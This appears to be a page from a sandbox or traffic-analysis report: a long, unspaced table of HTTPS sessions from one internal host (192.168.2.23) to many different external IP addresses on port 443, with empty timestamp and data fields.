                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24777192.168.2.2357216107.76.58.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24778192.168.2.234360695.111.62.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24779192.168.2.2358916104.215.70.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24780192.168.2.2335998153.51.96.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24781192.168.2.233965220.14.127.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24782192.168.2.2349166167.127.49.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24783192.168.2.2351848211.126.34.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24784192.168.2.2348280173.177.219.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24785192.168.2.2349606180.185.215.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24786192.168.2.2335944110.73.246.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24787192.168.2.2349682169.140.141.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24788192.168.2.2336624140.199.67.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24789192.168.2.235571887.214.216.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24790192.168.2.2332992119.8.100.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24791192.168.2.2350002206.195.146.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24792192.168.2.235679640.198.100.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24793192.168.2.2352260210.130.199.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24794192.168.2.2336270157.187.230.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24795192.168.2.2354502149.46.32.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24796192.168.2.233924269.123.232.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24797192.168.2.2349902101.238.2.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24798192.168.2.2339304100.234.171.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24799192.168.2.233634282.193.215.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24800192.168.2.234623624.155.119.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24801192.168.2.2337514115.140.207.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24802192.168.2.233420295.230.231.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24803192.168.2.2346384168.141.230.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24804192.168.2.2347802128.68.248.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24805192.168.2.233509692.51.75.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24806192.168.2.233868279.111.17.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24807192.168.2.233558440.113.244.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24808192.168.2.2353290134.74.183.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24809192.168.2.234916462.51.7.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24810192.168.2.2340020156.98.231.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24811192.168.2.2338856103.172.161.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24812192.168.2.234967283.33.164.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24813192.168.2.236020823.16.139.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24814192.168.2.2340222121.40.120.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24815192.168.2.234252846.207.123.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24816192.168.2.23595602.177.181.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24817192.168.2.233532061.164.72.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24818192.168.2.233593285.123.163.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24819192.168.2.2337106190.34.206.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24820192.168.2.2357410120.64.18.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24821192.168.2.23548005.72.10.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24822192.168.2.2341530209.117.230.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24823192.168.2.233758224.196.216.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24824192.168.2.2349568112.255.161.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24825192.168.2.2355924189.141.153.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24826192.168.2.2335580221.78.160.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24827192.168.2.2353578213.50.134.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24828192.168.2.2341784200.67.221.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24829192.168.2.236086831.125.169.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24830192.168.2.233619032.243.92.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24831192.168.2.23485102.36.198.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24832192.168.2.235128065.203.109.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24833192.168.2.234244861.241.198.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24834192.168.2.2348530164.217.236.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24835192.168.2.2360690130.20.248.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24836192.168.2.234196275.128.168.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24837192.168.2.2357418141.180.135.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24838192.168.2.2341722122.237.222.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24839192.168.2.2350110113.2.73.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24840192.168.2.2357586209.88.19.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24841192.168.2.23385368.226.129.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24842192.168.2.2335210143.229.49.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24843192.168.2.2335116197.120.168.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24844192.168.2.2338482149.98.61.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24845192.168.2.2339208167.169.16.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24846192.168.2.2358510129.231.54.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24847192.168.2.2341688202.21.167.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24848192.168.2.2359244162.68.97.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24849192.168.2.233372066.4.130.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24850192.168.2.2340664128.236.57.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24851192.168.2.233954279.235.184.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24852192.168.2.233390837.188.10.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24853192.168.2.234760895.162.250.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24854192.168.2.2341242171.156.25.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24855192.168.2.2358956111.12.184.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24856192.168.2.2339260188.199.134.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24857192.168.2.234416470.104.243.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24858192.168.2.2332820184.155.246.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24859192.168.2.235154276.33.170.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24860192.168.2.2344818122.195.165.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24861192.168.2.2359650110.229.169.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24862192.168.2.2347696136.218.104.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24863192.168.2.235027246.215.244.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24864192.168.2.2334962191.52.243.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24865192.168.2.2356004124.92.233.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24866192.168.2.2349730134.12.124.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24867192.168.2.2352982202.57.79.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24868192.168.2.2344480194.155.104.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24869192.168.2.23358549.122.9.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24870192.168.2.234387693.103.16.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24871192.168.2.235585097.224.195.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24872192.168.2.233369497.53.55.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24873192.168.2.235035412.129.224.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24874192.168.2.235608090.209.57.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24875192.168.2.2350970212.245.53.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24876192.168.2.235978817.228.211.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24877192.168.2.234070087.48.77.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24878192.168.2.2356320180.195.158.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24879192.168.2.235712688.30.77.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24880192.168.2.2333090178.191.136.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24881192.168.2.2348688119.41.51.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24882192.168.2.234622475.125.96.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24883192.168.2.235087042.102.15.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24884192.168.2.234285251.32.149.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24885192.168.2.233326090.212.80.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24886192.168.2.2344320152.60.45.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24887192.168.2.2347698150.231.150.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24888192.168.2.2348458206.109.64.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24889192.168.2.2359902160.104.13.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24890192.168.2.234341866.94.247.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24891192.168.2.2360748198.152.226.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24892192.168.2.2359590117.125.43.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24893192.168.2.235422413.195.63.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24894192.168.2.2359826177.228.245.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24895192.168.2.2337586220.169.92.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24896192.168.2.2359178132.129.117.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24897192.168.2.236069848.98.95.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24898192.168.2.2354664110.177.171.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24899192.168.2.2355264158.20.90.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24900192.168.2.235742481.148.94.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24901192.168.2.235515878.51.132.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24902192.168.2.2332770203.47.15.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24903192.168.2.235294235.78.95.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24904192.168.2.2342022179.137.213.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24905192.168.2.2338274222.223.49.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24906192.168.2.233283457.75.54.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24907192.168.2.2356470116.177.21.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24908192.168.2.2341884167.163.69.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24909192.168.2.2333122126.246.183.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24910192.168.2.2356754103.220.62.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24911192.168.2.235813860.38.154.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24912192.168.2.233825099.149.143.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24913192.168.2.2357814189.132.242.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24914192.168.2.235675217.216.182.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24915192.168.2.2358130111.100.147.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24916192.168.2.235346465.98.120.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24917192.168.2.2348576163.167.223.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24918192.168.2.235819865.217.0.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24919192.168.2.2358150149.229.130.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24920192.168.2.234807613.2.187.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24921192.168.2.234482424.227.124.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24922192.168.2.2346296140.15.138.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24923192.168.2.234011640.167.17.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24924192.168.2.23503525.205.179.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24925192.168.2.2339582159.126.171.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24926192.168.2.2345410145.15.158.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24927192.168.2.2359310216.213.196.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24928192.168.2.234922285.49.222.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24929192.168.2.2353746179.54.137.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24930192.168.2.2338736137.20.254.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24931192.168.2.234727634.58.170.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24932192.168.2.2343444182.194.48.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24933192.168.2.2350802217.89.78.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24934192.168.2.234018643.103.77.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24935192.168.2.2349948213.246.186.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24936192.168.2.2333666138.177.96.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24937192.168.2.233329224.175.160.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24938192.168.2.235870218.3.112.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24939192.168.2.234396258.14.81.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24940192.168.2.2350144136.177.35.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24941192.168.2.235323032.204.36.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24942192.168.2.2346852179.18.38.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24943192.168.2.2348666109.74.161.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24944192.168.2.2342600124.73.136.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24945192.168.2.2342734169.53.171.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24946192.168.2.233401892.170.82.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24947192.168.2.2342804139.37.21.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24948192.168.2.235389446.36.81.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24949192.168.2.2347370140.35.112.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24950192.168.2.2356470165.48.192.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24951192.168.2.2346602111.61.126.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24952192.168.2.2355820180.56.168.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24953192.168.2.2342720161.7.59.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24954192.168.2.235399237.147.157.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24955192.168.2.2359632177.123.201.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24956192.168.2.2356682145.37.75.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24957192.168.2.2360328175.49.224.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24958192.168.2.2339680182.76.33.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24959192.168.2.2357040196.47.124.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24960192.168.2.2352358184.95.170.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24961192.168.2.2338596185.151.26.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24962192.168.2.233886423.150.229.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24963192.168.2.2336934203.175.26.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24964192.168.2.233566298.157.219.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24965192.168.2.2342462209.131.178.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24966192.168.2.2332916205.192.234.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24967192.168.2.2335452146.255.227.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24968192.168.2.2356106145.71.100.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24969192.168.2.2336870185.34.64.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24970192.168.2.233944280.232.130.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24971192.168.2.2333304198.156.139.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24972192.168.2.2360834104.101.55.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24973192.168.2.2349488140.144.94.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24974192.168.2.235667624.232.129.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24975192.168.2.2355140156.164.64.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24976192.168.2.233707859.8.28.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24977192.168.2.233531460.252.60.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24978192.168.2.236091296.241.178.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24979192.168.2.234877061.221.191.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24980192.168.2.233694896.59.231.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24981192.168.2.2344868143.181.155.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24982192.168.2.23353749.207.46.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24983192.168.2.235131269.223.173.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24984192.168.2.23539862.70.103.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24985192.168.2.2336460122.189.164.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24986192.168.2.234829283.103.122.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24987192.168.2.2358694187.248.82.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24988192.168.2.234389249.29.113.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24989192.168.2.2338662163.24.252.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24990192.168.2.2358854120.184.211.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24991192.168.2.2337744145.147.60.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24992192.168.2.2360128197.122.204.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24993192.168.2.234005286.208.128.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24994192.168.2.2345490183.223.80.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24995192.168.2.2337410184.72.200.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24996192.168.2.233742466.45.144.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24997192.168.2.2348586132.67.197.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24998192.168.2.2333534105.21.163.212443
